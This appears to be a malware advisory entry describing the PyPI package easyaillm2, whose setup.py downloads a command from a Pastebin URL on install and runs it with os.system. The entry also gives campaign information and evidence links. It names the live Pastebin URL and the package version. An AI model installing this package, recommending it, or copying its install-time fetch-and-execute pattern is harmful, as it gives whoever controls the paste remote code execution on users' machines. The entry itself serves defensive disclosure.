Malicious code in easyaillm2 (PyPI)
MAL-2026-5765
Published · Modified
Description
__
Source: amazon-inspector (f532239be50513698758c81009444ff49bcf4a140fab11734107d81c4eab6684)
On pip install easyaillm2, setup.py fetches a raw text body from https://pastebin.com/raw/yBcUM1QB and passes the first line directly to os.system('cmd /c "..."'), executing whatever the mutable, anonymous Pastebin paste currently serves with the installer's privileges. There is no integrity check, no version pinning, and no relationship between the destination and any legitimate publisher. The package itself ships no module code (the source tree contains only egg-info), and its name/description mimic LLM-tooling naming (easyaillm2 / easyllama2) — the install-time Pastebin dropper is the package's only behavior. A Pastebin owner can swap the payload at any moment, turning every future pip install of this version into arbitrary remote code execution on the installer's machine.
Source: kam193 (44a9d76b87fed91bba537f979b2d6f63a7e1758c73424b2d3ffd47bffefe6761)
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
References
- EVIDENCE https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection
- EVIDENCE https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection
- EVIDENCE https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25
- WEB https://bad-packages.kam193.eu/pypi/package/easyaillm2
- PACKAGE https://pypi.org/project/easyaillm2/2.0.68/
Ready to move
Start Securing
Free, no credit card | First findings in minutes